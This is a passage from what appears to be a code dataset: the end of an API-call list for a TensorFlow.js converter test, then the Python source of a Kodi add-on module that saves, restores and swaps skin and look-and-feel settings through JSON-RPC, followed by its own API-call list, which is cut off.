((658, 11, 658, 33), 'numpy.random.randn', 'np.random.randn', ({(658, 27, 658, 28): '4', (658, 30, 658, 32): '10'}, {}), '(4, 10)', True, 'import numpy as np\n'), ((665, 6, 665, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(665, 44, 665, 49): 'model', (665, 51, 665, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((668, 24, 668, 59), 'os.path.join', 'os.path.join', ({(668, 37, 668, 50): 'self._tmp_dir', (668, 52, 668, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((670, 16, 674, 8), 'subprocess.Popen', 'subprocess.Popen', ({(670, 33, 674, 7): "['tensorflowjs_converter', '--input_format', 'keras_saved_model',\n '--output_format', 'tfjs_layers_model', self._tmp_dir, tfjs_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', '--output_format', 'tfjs_layers_model', self.\n _tmp_dir, tfjs_output_dir])", False, 'import subprocess\n'), ((678, 24, 678, 67), 'os.path.join', 'os.path.join', ({(678, 37, 678, 52): 'tfjs_output_dir', (678, 54, 678, 66): '"""model.json"""'}, {}), "(tfjs_output_dir, 'model.json')", False, 'import os\n'), ((682, 20, 682, 60), 'os.path.join', 'os.path.join', ({(682, 33, 682, 46): 'self._tmp_dir', (682, 48, 682, 59): '"""new_h5.h5"""'}, {}), "(self._tmp_dir, 'new_h5.h5')", False, 'import os\n'), ((683, 16, 685, 68), 'subprocess.Popen', 'subprocess.Popen', ({(683, 33, 685, 67): "['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])", False, 'import subprocess\n'), ((693, 20, 693, 56), 'tensorflow.keras.models.load_model', 'keras.models.load_model', ({(693, 44, 693, 55): 'new_h5_path'}, {}), '(new_h5_path)', False, 'from tensorflow import keras\n'), ((698, 34, 698, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((699, 10, 699, 32), 'numpy.random.randn', 'np.random.randn', ({(699, 26, 699, 27): '8', (699, 29, 699, 31): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((706, 6, 706, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(706, 44, 706, 49): 'model', (706, 51, 706, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((709, 24, 709, 59), 'os.path.join', 'os.path.join', ({(709, 37, 709, 50): 'self._tmp_dir', (709, 52, 709, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((711, 16, 717, 33), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((724, 34, 724, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((725, 10, 725, 32), 'numpy.random.randn', 'np.random.randn', ({(725, 26, 725, 27): '8', (725, 29, 725, 31): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((735, 6, 735, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(735, 44, 735, 49): 'model', (735, 51, 735, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((738, 24, 738, 59), 'os.path.join', 'os.path.join', ({(738, 37, 738, 50): 'self._tmp_dir', (738, 52, 738, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((740, 16, 743, 8), 'subprocess.Popen', 'subprocess.Popen', ({(740, 33, 743, 7): "['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])", False, 'import subprocess\n'), ((751, 26, 751, 69), 'os.path.join', 'os.path.join', ({(751, 39, 751, 52): 'self._tmp_dir', (751, 54, 751, 68): '"""tfjs_sharded"""'}, {}), "(self._tmp_dir, 'tfjs_sharded')", False, 'import os\n'), ((772, 20, 772, 60), 'os.path.join', 'os.path.join', ({(772, 33, 772, 46): 'self._tmp_dir', (772, 48, 772, 59): '"""new_h5.h5"""'}, {}), "(self._tmp_dir, 'new_h5.h5')", False, 'import os\n'), ((780, 34, 780, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((783, 18, 783, 54), 'tensorflow.keras.models.load_model', 'keras.models.load_model', ({(783, 42, 783, 53): 'new_h5_path'}, {}), '(new_h5_path)', False, 'from tensorflow import keras\n'), ((788, 34, 788, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((789, 10, 789, 32), 'numpy.random.randn', 'np.random.randn', ({(789, 26, 789, 27): '8', (789, 29, 789, 31): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((799, 6, 799, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(799, 44, 799, 49): 'model', (799, 51, 799, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((802, 24, 802, 59), 'os.path.join', 'os.path.join', ({(802, 37, 802, 50): 'self._tmp_dir', (802, 52, 802, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((804, 16, 807, 8), 'subprocess.Popen', 'subprocess.Popen', ({(804, 33, 807, 7): "['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])", False, 'import subprocess\n'), ((815, 26, 815, 69), 'os.path.join', 'os.path.join', ({(815, 39, 815, 52): 'self._tmp_dir', (815, 54, 815, 68): '"""tfjs_sharded"""'}, {}), "(self._tmp_dir, 'tfjs_sharded')", False, 'import os\n'), ((829, 25, 829, 57), 'os.path.getsize', 'os.path.getsize', ({(829, 41, 829, 56): 'weight_files[0]'}, {}), '(weight_files[0])', False, 'import os\n'), ((839, 14, 839, 72), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((840, 14, 840, 57), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((93, 11, 93, 33), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((170, 21, 170, 46), 'os.path.dirname', 'os.path.dirname', ({(170, 37, 170, 45): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((194, 23, 194, 35), 'json.load', 'json.load', ({(194, 33, 194, 34): 'f'}, {}), '(f)', False, 'import json\n'), ((236, 10, 236, 51), 'os.path.join', 'os.path.join', ({(236, 23, 236, 36): 'self._tmp_dir', (236, 38, 236, 50): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((246, 30, 246, 69), 'os.path.join', 'os.path.join', ({(246, 43, 246, 56): 'self._tmp_dir', (246, 58, 246, 68): '"""group*-*"""'}, {}), "(self._tmp_dir, 'group*-*')", False, 'import os\n'), ((274, 18, 274, 57), 'os.path.join', 'os.path.join', ({(274, 31, 274, 44): 'self._tmp_dir', (274, 46, 274, 56): '"""keras_h5"""'}, {}), "(self._tmp_dir, 'keras_h5')", False, 'import os\n'), ((287, 23, 287, 35), 'json.load', 'json.load', ({(287, 33, 287, 34): 'f'}, {}), '(f)', False, 'import json\n'), ((328, 18, 328, 57), 'os.path.join', 'os.path.join', ({(328, 31, 328, 44): 'self._tmp_dir', (328, 46, 328, 56): '"""keras_h5"""'}, {}), "(self._tmp_dir, 'keras_h5')", False, 'import os\n'), ((341, 23, 341, 35), 'json.load', 'json.load', ({(341, 33, 341, 34): 'f'}, {}), '(f)', False, 'import json\n'), ((384, 12, 384, 49), 'os.path.join', 'os.path.join', ({(384, 25, 384, 38): 'self._tmp_dir', (384, 40, 384, 48): '"""foo.h5"""'}, {}), "(self._tmp_dir, 'foo.h5')", False, 'import os\n'), ((385, 12, 385, 49), 'os.path.join', 'os.path.join', ({(385, 25, 385, 38): 'self._tmp_dir', (385, 40, 385, 48): '"""output"""'}, {}), "(self._tmp_dir, 'output')", False, 'import os\n'), ((411, 13, 411, 51), 'os.path.join', 'os.path.join', ({(411, 26, 411, 36): 'output_dir', (411, 38, 411, 50): '"""model.json"""'}, {}), "(output_dir, 'model.json')", False, 'import os\n'), ((415, 30, 415, 66), 'os.path.join', 'os.path.join', ({(415, 43, 415, 53): 'output_dir', (415, 55, 415, 65): '"""group*-*"""'}, {}), "(output_dir, 'group*-*')", False, 'import os\n'), ((437, 13, 437, 51), 'os.path.join', 'os.path.join', ({(437, 26, 437, 36): 'output_dir', (437, 38, 437, 50): '"""model.json"""'}, {}), "(output_dir, 'model.json')", False, 'import os\n'), ((441, 30, 441, 66), 'os.path.join', 'os.path.join', ({(441, 43, 441, 53): 'output_dir', (441, 55, 441, 65): '"""group*-*"""'}, {}), "(output_dir, 'group*-*')", False, 'import os\n'), ((464, 13, 464, 51), 'os.path.join', 'os.path.join', ({(464, 26, 464, 36): 'output_dir', (464, 38, 464, 50): '"""model.json"""'}, {}), "(output_dir, 'model.json')", False, 'import os\n'), ((479, 30, 479, 66), 'os.path.join', 'os.path.join', ({(479, 43, 479, 53): 'output_dir', (479, 55, 479, 65): '"""group*-*"""'}, {}), "(output_dir, 'group*-*')", False, 'import os\n'), ((500, 13, 500, 51), 'os.path.join', 'os.path.join', ({(500, 26, 500, 36): 'output_dir', (500, 38, 500, 50): '"""model.json"""'}, {}), "(output_dir, 'model.json')", False, 'import os\n'), ((504, 30, 504, 66), 'os.path.join', 'os.path.join', ({(504, 43, 504, 53): 'output_dir', (504, 55, 504, 65): '"""group*-*"""'}, {}), "(output_dir, 'group*-*')", False, 'import os\n'), ((527, 8, 527, 49), 'os.path.join', 'os.path.join', ({(527, 21, 527, 34): 'self._tmp_dir', (527, 36, 527, 48): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((557, 10, 557, 51), 'os.path.join', 'os.path.join', ({(557, 23, 557, 36): 'self._tmp_dir', (557, 38, 557, 50): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((637, 22, 637, 53), 'os.path.isfile', 'os.path.isfile', ({(637, 37, 637, 52): 'model_json_path'}, {}), '(model_json_path)', False, 'import os\n'), ((647, 22, 647, 49), 'os.path.isfile', 'os.path.isfile', ({(647, 37, 647, 48): 'new_h5_path'}, {}), '(new_h5_path)', False, 'import os\n'), ((679, 22, 679, 53), 'os.path.isfile', 'os.path.isfile', ({(679, 37, 679, 52): 'model_json_path'}, {}), '(model_json_path)', False, 'import os\n'), ((689, 22, 689, 49), 'os.path.isfile', 'os.path.isfile', ({(689, 37, 689, 48): 'new_h5_path'}, {}), '(new_h5_path)', False, 'import os\n'), ((721, 43, 721, 69), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(721, 62, 721, 68): 'stderr'}, {}), '(stderr)', True, 'import tensorflow as tf\n'), ((765, 27, 765, 45), 'os.path.getsize', 'os.path.getsize', ({(765, 43, 765, 44): 'f'}, {}), '(f)', False, 'import os\n'), ((860, 8, 860, 59), 'os.path.join', 'os.path.join', ({(860, 21, 860, 44): 'layers_model_output_dir', (860, 46, 860, 58): '"""model.json"""'}, {}), "(layers_model_output_dir, 'model.json')", False, 'import os\n'), ((866, 35, 866, 78), 'os.path.join', 'os.path.join', ({(866, 48, 866, 63): 'graph_model_dir', (866, 65, 866, 77): '"""model.json"""'}, {}), "(graph_model_dir, 'model.json')", False, 'import os\n'), ((868, 18, 868, 61), 'os.path.join', 'os.path.join', ({(868, 31, 868, 46): 'graph_model_dir', (868, 48, 868, 60): '"""group*.bin"""'}, {}), "(graph_model_dir, 'group*.bin')", False, 'import os\n'), ((193, 16, 193, 57), 'os.path.join', 'os.path.join', ({(193, 29, 193, 42): 'self._tmp_dir', (193, 44, 193, 56): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((227, 9, 227, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((233, 9, 233, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((272, 9, 272, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((286, 16, 286, 57), 'os.path.join', 'os.path.join', ({(286, 29, 286, 42): 'self._tmp_dir', (286, 44, 286, 56): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((326, 9, 326, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((340, 16, 340, 57), 'os.path.join', 'os.path.join', ({(340, 29, 340, 42): 'self._tmp_dir', (340, 44, 340, 56): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((510, 9, 510, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((533, 9, 533, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((542, 9, 542, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((555, 9, 555, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((616, 9, 616, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((656, 9, 656, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((698, 9, 698, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((724, 9, 724, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((756, 10, 756, 53), 'os.path.join', 'os.path.join', ({(756, 23, 756, 38): 'tfjs_output_dir', (756, 40, 756, 52): '"""model.json"""'}, {}), "(tfjs_output_dir, 'model.json')", False, 'import os\n'), ((763, 20, 763, 65), 'os.path.join', 'os.path.join', ({(763, 33, 763, 50): 'sharded_model_dir', (763, 52, 763, 64): '"""group*.bin"""'}, {}), "(sharded_model_dir, 'group*.bin')", False, 'import os\n'), ((775, 10, 775, 55), 'os.path.join', 'os.path.join', ({(775, 23, 775, 40): 'sharded_model_dir', (775, 42, 775, 54): '"""model.json"""'}, {}), "(sharded_model_dir, 'model.json')", False, 'import os\n'), ((780, 9, 780, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((788, 9, 788, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((820, 10, 820, 53), 'os.path.join', 'os.path.join', ({(820, 23, 820, 38): 'tfjs_output_dir', (820, 40, 820, 52): '"""model.json"""'}, {}), "(tfjs_output_dir, 'model.json')", False, 'import os\n'), ((827, 20, 827, 65), 'os.path.join', 'os.path.join', ({(827, 33, 827, 50): 'sharded_model_dir', (827, 52, 827, 64): '"""group*.bin"""'}, {}), "(sharded_model_dir, 'group*.bin')", False, 'import os\n'), ((323, 27, 323, 64), 'os.path.join', 'os.path.join', ({(323, 40, 323, 53): 'self._tmp_dir', (323, 55, 323, 63): '"""group*"""'}, {}), "(self._tmp_dir, 'group*')", False, 'import os\n'), ((377, 27, 377, 64), 'os.path.join', 'os.path.join', ({(377, 40, 377, 53): 'self._tmp_dir', (377, 55, 377, 63): '"""group*"""'}, {}), "(self._tmp_dir, 'group*')", False, 'import os\n'), ((733, 31, 733, 41), 'numpy.size', 'np.size', ({(733, 39, 733, 40): 'w'}, {}), '(w)', True, 'import numpy as np\n'), ((797, 31, 797, 41), 'numpy.size', 'np.size', ({(797, 39, 797, 40): 'w'}, {}), '(w)', True, 'import numpy as np\n'), ((101, 20, 103, 51), 'tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def', 'tf.compat.v1.saved_model.signature_def_utils.predict_signature_def', (), '', True, 'import tensorflow as tf\n')]
rrosajp/script.ezclean
script.ezclean/resources/lib/modules/skinz.py
ed6fbe6441713a3c96ce15a595cdd5c69291355f
# -*- coding: UTF-8 -*- import os, re, shutil, time, xbmc from resources.lib.modules import control try: import json as simplejson except: import simplejson ADDONS = os.path.join(control.HOMEPATH, 'addons') def currSkin(): return control.skin def getOld(old): try: old = '"%s"' % old query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":%s}, "id":1}' % (old) response = control.jsonrpc(query) response = simplejson.loads(response) if response.has_key('result'): if response['result'].has_key('value'): return response ['result']['value'] except: pass return None def setNew(new, value): try: new = '"%s"' % new value = '"%s"' % value query = '{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":%s,"value":%s}, "id":1}' % (new, value) response = control.jsonrpc(query) except: pass return None def swapSkins(skin): old = 'lookandfeel.skin' value = skin current = getOld(old) new = old setNew(new, value) def lookandFeelData(do='save'): scan = ['lookandfeel.enablerssfeeds', 'lookandfeel.font', 'lookandfeel.rssedit', 'lookandfeel.skincolors', 'lookandfeel.skintheme', 'lookandfeel.skinzoom', 'lookandfeel.soundskin', 'lookandfeel.startupwindow', 'lookandfeel.stereostrength'] if do == 'save': for item in scan: query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"%s"}, "id":1}' % (item) response = control.jsonrpc(query) if not 'error' in response: match = re.compile('{"value":(.+?)}').findall(str(response)) control.setSetting(item.replace('lookandfeel', 'default'), match[0]) control.log("%s saved to %s" % (item, match[0])) else: for item in scan: value = setting(item.replace('lookandfeel', 'default')) query = '{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"%s","value":%s}, "id":1}' % (item, value) response = control.jsonrpc(query) control.log("%s restored to %s" % (item, value)) def defaultSkin(): control.log("[Default Skin Check]") tempgui = os.path.join(USERDATAPATH, 'guitemp.xml') gui = tempgui if os.path.exists(tempgui) else GUISETTINGS if not os.path.exists(gui): return False control.log("Reading gui file: %s" % gui) guif = open(gui, 'r+') msg = guif.read().replace('\n','').replace('\r','').replace('\t','').replace(' ',''); guif.close() control.log("Opening gui settings") match = re.compile('<lookandfeel>.+?<ski.+?>(.+?)</skin>.+?</lookandfeel>').findall(msg) control.log("Matches: %s" % str(match)) if len(match) > 0: skinid = match[0] addonxml = os.path.join(ADDONS, match[0], 'addon.xml') if os.path.exists(addonxml): addf = open(addonxml, 'r+') msg2 = addf.read().replace('\n','').replace('\r','').replace('\t',''); addf.close() match2 = re.compile('<addon.+?ame="(.+?)".+?>').findall(msg2) if len(match2) > 0: skinname = match2[0] else: skinname = 'no match' else: skinname = 'no file' control.log("[Default Skin Check] Skin name: %s" % skinname) control.log("[Default Skin Check] Skin id: %s" % skinid) control.setSetting('defaultskin', skinid) control.setSetting('defaultskinname', skinname) control.setSetting('defaultskinignore', 'false') if os.path.exists(tempgui): control.log("Deleting Temp Gui File.") os.remove(tempgui) control.log("[Default Skin Check] End") def checkSkin(): control.loga("Invalid Skin Check Start") DEFAULTSKIN = setting('defaultskin') DEFAULTNAME = setting('defaultskinname') DEFAULTIGNORE = setting('defaultskinignore') gotoskin = False if not DEFAULTSKIN == '': if os.path.exists(os.path.join(ADDONS, DEFAULTSKIN)): if DIALOG.yesno(AddonTitle, "[COLOR %s]It seems that the skin has been set back to [COLOR %s]%s[/COLOR]" % (COLOR2, COLOR1, SKIN[5:].title()), "Would you like to set the skin back to:[/COLOR]", '[COLOR %s]%s[/COLOR]' % (COLOR1, DEFAULTNAME)): gotoskin = DEFAULTSKIN gotoname = DEFAULTNAME else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true'); gotoskin = False else: control.setSetting('defaultskin', ''); control.setSetting('defaultskinname', ''); DEFAULTSKIN = ''; DEFAULTNAME = '' if DEFAULTSKIN == '': skinname = [] skinlist = [] for folder in glob.glob(os.path.join(ADDONS, 'skin.*/')): xml = "%s/addon.xml" % folder if os.path.exists(xml): f = open(xml,mode='r'); g = f.read().replace('\n','').replace('\r','').replace('\t',''); f.close(); match = re.compile('<addon.+?id="(.+?)".+?>').findall(g) match2 = re.compile('<addon.+?name="(.+?)".+?>').findall(g) control.loga("%s: %s" % (folder, str(match[0]))) if len(match) > 0: skinlist.append(str(match[0])); skinname.append(str(match2[0])) else: control.loga("ID not found for %s" % folder) else: control.loga("ID not found for %s" % folder) if len(skinlist) > 0: if len(skinlist) > 1: if DIALOG.yesno(control.AddonTitle, "[COLOR %s]It seems that the skin has been set back to [COLOR %s]%s[/COLOR]" % (COLOR2, COLOR1, SKIN[5:].title()), "Would you like to view a list of avaliable skins?[/COLOR]"): choice = DIALOG.select("Select skin to switch to!", skinname) if choice == -1: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true') else: gotoskin = skinlist[choice] gotoname = skinname[choice] else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true') else: if DIALOG.yesno(control.AddonTitle, "It seems that the skin has been set back to [B]%s[/B]" % (SKIN[5:].title()), "Would you like to set the skin back to: ", '[B] %s [/B]' % (skinname[0])): gotoskin = skinlist[0] gotoname = skinname[0] else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true') else: control.loga("No skins found in addons folder."); control.setSetting('defaultskinignore', 'true'); gotoskin = False if gotoskin: swapSkins(gotoskin) x = 0 control.sleep(1000) while not control.condVisibility("Window.isVisible(yesnodialog)") and x < 150: x += 1 control.sleep(200) if control.condVisibility("Window.isVisible(yesnodialog)"): control.execute('SendClick(11)') lookandFeelData('restore') else: control.Notify(control.AddonTitle,'Skin Swap Timed Out!') control.loga("Invalid Skin Check End")
[((9, 9, 9, 49), 'os.path.join', 'os.path.join', ({(9, 22, 9, 38): 'control.HOMEPATH', (9, 40, 9, 48): '"""addons"""'}, {}), "(control.HOMEPATH, 'addons')", False, 'import os, re, shutil, time, xbmc\n'), ((68, 4, 68, 39), 'resources.lib.modules.control.log', 'control.log', ({(68, 16, 68, 38): '"""[Default Skin Check]"""'}, {}), "('[Default Skin Check]')", False, 'from resources.lib.modules import control\n'), ((69, 14, 69, 55), 'os.path.join', 'os.path.join', ({(69, 27, 69, 39): 'USERDATAPATH', (69, 41, 69, 54): '"""guitemp.xml"""'}, {}), "(USERDATAPATH, 'guitemp.xml')", False, 'import os, re, shutil, time, xbmc\n'), ((72, 4, 72, 45), 'resources.lib.modules.control.log', 'control.log', ({(72, 16, 72, 44): "('Reading gui file: %s' % gui)"}, {}), "('Reading gui file: %s' % gui)", False, 'from resources.lib.modules import control\n'), ((75, 4, 75, 39), 'resources.lib.modules.control.log', 'control.log', ({(75, 16, 75, 38): '"""Opening gui settings"""'}, {}), "('Opening gui settings')", False, 'from resources.lib.modules import control\n'), ((93, 7, 93, 30), 'os.path.exists', 'os.path.exists', ({(93, 22, 93, 29): 'tempgui'}, {}), '(tempgui)', False, 'import os, re, shutil, time, xbmc\n'), ((96, 4, 96, 43), 'resources.lib.modules.control.log', 'control.log', ({(96, 16, 96, 42): '"""[Default Skin Check] End"""'}, {}), "('[Default Skin Check] End')", False, 'from resources.lib.modules import control\n'), ((100, 4, 100, 44), 'resources.lib.modules.control.loga', 'control.loga', ({(100, 17, 100, 43): '"""Invalid Skin Check Start"""'}, {}), "('Invalid Skin Check Start')", False, 'from resources.lib.modules import control\n'), ((151, 4, 151, 42), 'resources.lib.modules.control.loga', 'control.loga', ({(151, 17, 151, 41): '"""Invalid Skin Check End"""'}, {}), "('Invalid Skin Check End')", False, 'from resources.lib.modules import control\n'), ((20, 19, 20, 41), 'resources.lib.modules.control.jsonrpc', 'control.jsonrpc', ({(20, 35, 20, 40): 'query'}, {}), '(query)', False, 'from resources.lib.modules import control\n'), ((21, 19, 21, 45), 'simplejson.loads', 'simplejson.loads', ({(21, 36, 21, 44): 'response'}, {}), '(response)', False, 'import simplejson\n'), ((35, 19, 35, 41), 'resources.lib.modules.control.jsonrpc', 'control.jsonrpc', ({(35, 35, 35, 40): 'query'}, {}), '(query)', False, 'from resources.lib.modules import control\n'), ((70, 21, 70, 44), 'os.path.exists', 'os.path.exists', ({(70, 36, 70, 43): 'tempgui'}, {}), '(tempgui)', False, 'import os, re, shutil, time, xbmc\n'), ((71, 11, 71, 30), 'os.path.exists', 'os.path.exists', ({(71, 26, 71, 29): 'gui'}, {}), '(gui)', False, 'import os, re, shutil, time, xbmc\n'), ((80, 19, 80, 62), 'os.path.join', 'os.path.join', ({(80, 32, 80, 38): 'ADDONS', (80, 40, 80, 48): 'match[0]', (80, 50, 80, 61): '"""addon.xml"""'}, {}), "(ADDONS, match[0], 'addon.xml')", False, 'import os, re, shutil, time, xbmc\n'), ((81, 11, 81, 35), 'os.path.exists', 'os.path.exists', ({(81, 26, 81, 34): 'addonxml'}, {}), '(addonxml)', False, 'import os, re, shutil, time, xbmc\n'), ((88, 8, 88, 68), 'resources.lib.modules.control.log', 'control.log', ({(88, 20, 88, 67): "('[Default Skin Check] Skin name: %s' % skinname)"}, {}), "('[Default Skin Check] Skin name: %s' % skinname)", False, 'from resources.lib.modules import control\n'), ((89, 8, 89, 64), 'resources.lib.modules.control.log', 'control.log', ({(89, 20, 89, 63): "('[Default Skin Check] Skin id: %s' % skinid)"}, {}), "('[Default Skin Check] Skin id: %s' % skinid)", False, 'from resources.lib.modules import control\n'), ((90, 8, 90, 49), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(90, 27, 90, 40): '"""defaultskin"""', (90, 42, 90, 48): 'skinid'}, {}), "('defaultskin', skinid)", False, 'from resources.lib.modules import control\n'), ((91, 8, 91, 55), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(91, 27, 91, 44): '"""defaultskinname"""', (91, 46, 91, 54): 'skinname'}, {}), "('defaultskinname', skinname)", False, 'from resources.lib.modules import control\n'), ((92, 8, 92, 56), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(92, 27, 92, 46): '"""defaultskinignore"""', (92, 48, 92, 55): '"""false"""'}, {}), "('defaultskinignore', 'false')", False, 'from resources.lib.modules import control\n'), ((94, 8, 94, 46), 'resources.lib.modules.control.log', 'control.log', ({(94, 20, 94, 45): '"""Deleting Temp Gui File."""'}, {}), "('Deleting Temp Gui File.')", False, 'from resources.lib.modules import control\n'), ((95, 8, 95, 26), 'os.remove', 'os.remove', ({(95, 18, 95, 25): 'tempgui'}, {}), '(tempgui)', False, 'import os, re, shutil, time, xbmc\n'), ((143, 8, 143, 27), 'resources.lib.modules.control.sleep', 'control.sleep', ({(143, 22, 143, 26): '(1000)'}, {}), '(1000)', False, 'from resources.lib.modules import control\n'), ((147, 11, 147, 66), 'resources.lib.modules.control.condVisibility', 'control.condVisibility', ({(147, 34, 147, 65): '"""Window.isVisible(yesnodialog)"""'}, {}), "('Window.isVisible(yesnodialog)')", False, 'from resources.lib.modules import control\n'), ((54, 23, 54, 45), 'resources.lib.modules.control.jsonrpc', 'control.jsonrpc', ({(54, 39, 54, 44): 'query'}, {}), '(query)', False, 'from resources.lib.modules import control\n'), ((63, 23, 63, 45), 'resources.lib.modules.control.jsonrpc', 'control.jsonrpc', ({(63, 39, 63, 44): 'query'}, {}), '(query)', False, 'from resources.lib.modules import control\n'), ((64, 12, 64, 60), 'resources.lib.modules.control.log', 'control.log', ({(64, 24, 64, 59): "('%s restored to %s' % (item, value))"}, {}), "('%s restored to %s' % (item, value))", False, 'from resources.lib.modules import control\n'), ((76, 12, 76, 79), 're.compile', 're.compile', ({(76, 23, 76, 78): '"""<lookandfeel>.+?<ski.+?>(.+?)</skin>.+?</lookandfeel>"""'}, {}), "('<lookandfeel>.+?<ski.+?>(.+?)</skin>.+?</lookandfeel>')", False, 'import os, re, shutil, time, xbmc\n'), ((106, 26, 106, 59), 'os.path.join', 'os.path.join', ({(106, 39, 106, 45): 'ADDONS', (106, 47, 106, 58): 'DEFAULTSKIN'}, {}), '(ADDONS, DEFAULTSKIN)', False, 'import os, re, shutil, time, xbmc\n'), ((111, 14, 111, 51), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(111, 33, 111, 46): '"""defaultskin"""', (111, 48, 111, 50): '""""""'}, {}), "('defaultskin', '')", False, 'from resources.lib.modules import control\n'), ((111, 53, 111, 94), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(111, 72, 111, 89): '"""defaultskinname"""', (111, 91, 111, 93): '""""""'}, {}), "('defaultskinname', '')", False, 'from resources.lib.modules import control\n'), ((115, 32, 115, 63), 'os.path.join', 'os.path.join', ({(115, 45, 115, 51): 'ADDONS', (115, 53, 115, 62): '"""skin.*/"""'}, {}), "(ADDONS, 'skin.*/')", False, 'import os, re, shutil, time, xbmc\n'), ((117, 15, 117, 34), 'os.path.exists', 'os.path.exists', ({(117, 30, 117, 33): 'xml'}, {}), '(xml)', False, 'import os, re, shutil, time, xbmc\n'), ((139, 14, 139, 62), 'resources.lib.modules.control.loga', 'control.loga', ({(139, 27, 139, 61): '"""No skins found in addons folder."""'}, {}), "('No skins found in addons folder.')", False, 'from resources.lib.modules import control\n'), ((139, 64, 139, 111), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(139, 83, 139, 102): 